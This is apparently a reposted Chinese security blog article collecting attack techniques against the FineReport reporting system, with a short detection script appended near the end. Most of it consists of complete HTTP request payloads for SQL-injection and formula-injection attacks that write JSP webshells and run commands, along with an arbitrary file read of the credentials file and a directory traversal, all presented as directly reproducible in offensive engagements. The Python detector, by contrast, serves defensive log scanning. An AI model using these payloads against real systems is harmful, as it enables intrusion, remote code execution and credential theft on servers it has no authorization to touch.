Offensive Security in Practice | FineReport (帆软报表) Attack Techniques Collection

admin 2026-05-19 05:26:03 Cybersecurity articles Source: ZONE.CI 全球网

Article summary: The document analyzes several high-risk security vulnerabilities in the FineReport reporting system, including SQL injection in the exportexcel interface leading to RCE, SQL injection RCE in the ReportServer interface, and RCE in the print/ie/pdf component. Through concrete POCs it demonstrates obtaining a sessionID and writing webshells (an AntSword shell and a cmd shell), and notes practical details such as custom root directories and changing the database name. The article provides complete HTTP request packets and encoding tricks, and is directly reproducible in offensive engagements. Overall score: 87 Categories: vulnerability analysis, penetration testing, web security, practical experience, red team


Original | 安全艺术 | May 12, 2026 13:11, Beijing


A quick write-up of some FineReport attack techniques encountered during real-world engagements.

1. SQL injection in the FineReport export excel interface leads to RCE

The root directory is not necessarily webroot; in practice I have run into custom root directories.

Obtain the sessionID

POST /webroot/ReportServer HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 53

op=getSessionID&viewlets=[5b]{'reportlet':'/'}[5d]&

Write a one-line shell as proof of the file write

GET /webroot/decision/nx/report/v9/largedataset/export/excel?functionParams=%7b%7d&__parameters__=%7b%7d HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: */*
params: %3Ctest%3E%0A%3CLargeDatasetExcelExportJS%20dsName%3D%22XX%22%20colNames%3D%22%7B%7D%22%3E%0A%3CParameters%3E%0A%3CParameter%3E%0A%3CAttributes%20name%3D%22aaa%22/%3E%0A%3CO%20t%3D%22Formula%22%3E%3CAttributes%3Esql%28%27FRDemo%27%2C%22VACUUM%20into%20%28%27FRDemo2.db%27%29%22%2C1%29-sql%28%27FRDemo%27%2C%22pragma%20writable_schema%3Don%22%2C1%29-sql%28%27FRDemo%27%2C%22delete%20from%20sqlite_schema%22%2C1%29-sql%28%27FRDemo%27%2C%22create%20table%20a%28u%20text%29%22%2C1%29-sql%28%27FRDemo%27%2C%22replace%20into%20a%20values%28char%2860%29%7C%7Cchar%2837%29%7C%7Cchar%2832%29%7C%7Cchar%28111%29%7C%7Cchar%28117%29%7C%7Cchar%28116%29%7C%7Cchar%2846%29%7C%7Cchar%28112%29%7C%7Cchar%28114%29%7C%7Cchar%28105%29%7C%7Cchar%28110%29%7C%7Cchar%28116%29%7C%7Cchar%28108%29%7C%7Cchar%28110%29%7C%7Cchar%2840%29%7C%7Cchar%2834%29%7C%7Cchar%28115%29%7C%7Cchar%28101%29%7C%7Cchar%2899%29%7C%7Cchar%28116%29%7C%7Cchar%28101%29%7C%7Cchar%28115%29%7C%7Cchar%28116%29%7C%7Cchar%2850%29%7C%7Cchar%2848%29%7C%7Cchar%2850%29%7C%7Cchar%2854%29%7C%7Cchar%2848%29%7C%7Cchar%2849%29%7C%7Cchar%2850%29%7C%7Cchar%2854%29%7C%7Cchar%2834%29%7C%7Cchar%2841%29%7C%7Cchar%2859%29%7C%7Cchar%2837%29%7C%7Cchar%2862%29%29%22%2C1%29-sql%28%27FRDemo%27%2C%22COMMIT%22%2C1%29-sql%28%27FRDemo%27%2C%22VACUUM%20into%20%28%27%22%2BJOINARRAY%28%5BENV_HOME%2C%27/../sectest.jsp%27%5D%2C%27%27%29%2B%22%27%29%22%2C1%29%3C/Attributes%3E%3C/O%3E%0A%3C/Parameter%3E%0A%3C/Parameters%3E%3C/LargeDatasetExcelExportJS%3E%3C/test%3E
sessionID: 10f1fd1d-177d-484e-bcc8-afe42ddfa7cd
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: keep-alive

Visit http://xxx.xxx.com/webroot/sectest.jsp

2. SQL injection in the FineReport ReportServer interface leads to RCE

Note: if you want to exploit it again after a first run, change the database name.

2.1. POC

http://xxx.xxx.xxx:11000/webroot/decision/view/ReportServer?test=s&n=${ENV_HOME}

GET /webroot/decision/view/ReportServer?test=&n=${9*9} HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: tenantId=default

2.2. Write an AntSword (蚁剑) shell

http://xxx.xxx.xxx/webroot/secsec.jsp?a=javax.script.ScriptEngineManager

Password: a

Type: jspjs

/webroot/decision/view/ReportServer?test=s&n=${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFATTACH%20DATABASE%20%27..%2Fwebapps%2Fwebroot%2Fsecsec.jsp%27%20as%20secsec%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFCREATE%20TABLE%20secsec.exp2%28data%20text%29%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFINSERT%20INTO%20secsec.exp2%28data%29%20VALUES%20%28x%27247b27272e676574436c61737328292e666f724e616d6528706172616d2e61292e6e6577496e7374616e636528292e676574456e67696e6542794e616d6528276a7327292e6576616c28706172616d2e62297d%27%29%3B'),1,1)}

2.3. Write a cmd shell

/webroot/decision/view/ReportServer?test=s&n=${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFATTACH%20DATABASE%20%27..%2Fwebapps%2Fwebroot%2Fsecsec.jsp%27%20as%20secsec%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFCREATE%20TABLE%20secsec.exp2%28data%20text%29%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFINSERT%20INTO%20secsec.exp2%28data%29%20VALUES%20%28x%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%27%29%3B'),1,1)}

Visit

http://xx.xxx.xxx/webroot/secsec.jsp?pwd=secsec&cmd=whoami

3. print/ie/pdf RCE

3.1. Run python frencode.py

3.2. Send the following request

GET /webroot/decision/nx/report/v9/print/ie/pdf HTTP/1.1
Host:
sessionID:[24][7B][5F][5F]fr[5F]locale[5F][5F][3D]sql[28][27]FRDemo[27][2C]DECODE[28][27][25]25EF[25]25BB[25]25BFATTACH[25]2520DATABASE[25]2520[25]2527[2E][2E][25]252Fwebapps[25]252Fwebroot[25]252Fgnip[2E]jsp[25]2527[25]2520as[25]2520izzlul[25]253B[27][29][2C]1[2C]1[29][7D][24][7B][5F][5F]fr[5F]locale[5F][5F][3D]sql[28][27]FRDemo[27][2C]DECODE[28][27][25]25EF[25]25BB[25]25BFCREATE[25]2520TABLE[25]2520izzlul[2E]gni[25]2528data[25]2520text[25]2529[25]253B[27][29][2C]1[2C]1[29][7D][24][7B][5F][5F]fr[5F]locale[5F][5F][3D]sql[28][27]FRDemo[27][2C]DECODE[28][27][25]25EF[25]25BB[25]25BFINSERT[25]2520INTO[25]2520izzlul[2E]gni[25]2528data[25]2529[25]2520VALUES[25]2520[25]2528x[25]25273c2540207061676520696d706f72743d226a6176612e696f2e2a2c6a6176612e7574696c2e4261736536342220253e3c256f75742e7072696e7428224b464322293b537472696e6720613d726571756573742e676574506172616d6574657228226122293b69662861213d6e756c6c297b627974655b5d20623d4261736536342e6765744465636f64657228292e6465636f64652861293b537472696e6720703d726571756573742e676574536572766c6574436f6e7465787428292e6765745265616c5061746828726571756573742e676574536572766c6574506174682829293b537472696e67206469723d6e65772046696c652870292e676574506172656e7428293b46696c654f757470757453747265616d206f3d6e65772046696c654f757470757453747265616d286e65772046696c65286469722c22776562726f6f742d686f6d652e6a73702229293b6f2e77726974652862293b6f2e636c6f736528293b7d253e0a[25]2527[25]2529[25]253B[27][29][2C]1[2C]1[29][7D]
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: tenantId=default
Connection: keep-alive

3.3. Visit the generated webshell at /webroot/utuo.jsp

If it returns 200 but the page is not parsed properly, try accessing the following endpoint first and then visit the webshell again.

/webroot/decision/file?path=org.apache.jasper.servlet.Jasperlnitializer&type=class

3.4. Command execution shell

GET /webroot/decision/nx/report/v9/print/ie/pdf HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.2764.2 Safari/537.36
sessionID: [24][7B][5F][5F]fr[5F]locale[5F][5F][3D]sql[28][27]FRDemo[27][2C]DECODE[28][27][25]25EF[25]25BB[25]25BFATTACH[25]2520DATABASE[25]2520[25]2527[2E][2E][25]252Fwebapps[25]252Fwebroot[25]252Fpoiu[2E]jsp[25]2527[25]2520as[25]2520qwerty[25]253B[27][29][2C]1[2C]1[29][7D][24][7B][5F][5F]fr[5F]locale[5F][5F][3D]sql[28][27]FRDemo[27][2C]DECODE[28][27][25]25EF[25]25BB[25]25BFCREATE[25]2520TABLE[25]2520qwerty[2E]rce[25]2528data[25]2520text[25]2529[25]253B[27][29][2C]1[2C]1[29][7D][24][7B][5F][5F]fr[5F]locale[5F][5F][3D]sql[28][27]FRDemo[27][2C]DECODE[28][27][25]25EF[25]25BB[25]25BFINSERT[25]2520INTO[25]2520qwerty[2E]rce[25]2528data[25]2529[25]2520VALUES[25]2520[25]2528x[25]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[25]2527[25]2529[25]253B[27][29][2C]1[2C]1[29][7D]
/webroot/poiu.jsp?cmd=whoami

4. Remote command execution in the FineReport channel endpoint

POST /webroot/decision/remote/design/channel HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json
Testdmc: whoami
Testecho: echo
Cache-Control: no-cache
Pragma: no-cache
Host:
Content-Length: 10193


5. FineReport V8 get_geo_json arbitrary file read

  • FineReport < v8.0
WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml

After obtaining the account credentials, decrypt them.

6. FineReport V8 fs_remote_design directory traversal

  • FineReport < v8.0
GET /WebReport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=../../&currentUserName=admin&currentUserId=1&isWebReport=true HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Length: 230
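The requests in sections 1 to 3, 5 and 6 above all carry a small set of fixed markers (the sql('FRDemo', ...) formula call, VACUUM INTO / ATTACH DATABASE, a ${...} formula in the n parameter or the sessionID header, the Formula element in the export/excel params XML, and the get_geo_json / fs_remote_design query strings), hidden behind the [HH] bracket and double percent-encoding shown in section 3. The following detector is an added example and is not part of the original post or of FineReport; it normalizes those encodings and matches the markers against constructed sample log lines (the "request line plus payload header" log format is an assumption).

```python
import re
from urllib.parse import unquote

# Indicator strings lifted from the requests quoted above: formula call,
# SQLite file-write primitives, ${...} smuggled through the n parameter or the
# sessionID header, the export/excel Formula element, V8 read/traversal, channel.
INDICATORS = {
    "formula_sql_call": re.compile(r"sql\s*\(\s*'FRDemo'", re.I),
    "sqlite_file_write": re.compile(r"\b(VACUUM\s+into|ATTACH\s+DATABASE)\b", re.I),
    "formula_in_n_param": re.compile(r"ReportServer\?.*\bn=\$\{", re.I),
    "formula_in_session_id": re.compile(r"sessionID[=:]\s*\$\{", re.I),
    "formula_in_export_xml": re.compile(r'<O\s+t="Formula">', re.I),
    "geo_json_file_read": re.compile(r"get_geo_json&.*resourcepath=", re.I),
    "remote_design_traversal": re.compile(r"fs_remote_design&.*file_path=\.\./", re.I),
    "design_channel_post": re.compile(r"/remote/design/channel", re.I),
}

BRACKET_HEX = re.compile(r"\[([0-9A-Fa-f]{2})\]")

def normalize(value: str, max_rounds: int = 4) -> str:
    """Undo the [HH] bracket encoding used in the sessionID header, then
    percent-decode repeatedly: the payloads are double-encoded (e.g. %2528)."""
    text = BRACKET_HEX.sub(lambda m: chr(int(m.group(1), 16)), value)
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def scan_line(line: str) -> list[str]:
    """Names of every indicator that fires on one normalized log line."""
    text = normalize(line)
    return [name for name, rx in INDICATORS.items() if rx.search(text)]

def scan_log(lines: list[str]) -> dict[int, list[str]]:
    """Map 1-based line numbers to their hits; clean lines are omitted."""
    report = {}
    for num, line in enumerate(lines, 1):
        hits = scan_line(line)
        if hits:
            report[num] = hits
    return report

# Constructed sample log lines (request line plus the header that carried the
# payload, shortened from the requests above); the last line is benign.
SAMPLE_LOG = [
    "GET /webroot/decision/view/ReportServer?test=s&n=${9*9} HTTP/1.1",
    "GET /webroot/decision/view/ReportServer?test=s&n=${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFATTACH%20DATABASE%20%27x.jsp%27%20as%20s%3B'),1,1)} HTTP/1.1",
    "GET /webroot/decision/nx/report/v9/print/ie/pdf HTTP/1.1 sessionID:[24][7B][5F][5F]fr[5F]locale[5F][5F][3D]sql[28][27]FRDemo[27][2C]DECODE[28][27][25]25EF[25]25BB[25]25BFATTACH[25]2520DATABASE[25]2520[25]2527",
    "GET /webroot/decision/nx/report/v9/largedataset/export/excel?functionParams=%7b%7d HTTP/1.1 params:%3CO%20t%3D%22Formula%22%3E%3CAttributes%3Esql%28%27FRDemo%27%2C%22VACUUM%20into%20%28%27FRDemo2.db%27%29%22%2C1%29",
    "GET /WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml HTTP/1.1",
    "GET /WebReport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=../../ HTTP/1.1",
    "POST /webroot/decision/remote/design/channel HTTP/1.1",
    "GET /webroot/decision/view/ReportServer?op=page_content&sessionID=abc HTTP/1.1",
]

if __name__ == "__main__":
    for num, hits in scan_log(SAMPLE_LOG).items():
        print(f"line {num}: {', '.join(hits)}")
```

The bare ${9*9} probe on the first sample line fires only the formula_in_n_param rule, which is the earliest signal of the ReportServer technique before any sql() call appears.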

7. dd2 scan output

I run a small private group for hands-on practice; interested folks are welcome to join: follow the public account and reply "dddd" for contact details. Serious inquiries only, thanks.


Disclaimer:

The programs and techniques in this article are intended solely for lawful and compliant security research and teaching, with the aim of improving network security defenses; they are explicitly of a technical research nature.

Any entity or individual who, without authorization, uses the content of this article for attacks, sabotage or other illegal purposes bears sole responsibility for all resulting legal liability, civil compensation and joint liability; this site assumes no joint liability.

Content on this site is published for technical exchange and knowledge sharing; if there is a copyright infringement or other objection, please contact us by e-mail; contact details are under "Contact me" at the top of the page.

Reposted from: 安全艺术, "攻防实战 | 帆软报表FineReport打法合集" (Offensive Security in Practice | FineReport Attack Techniques Collection)
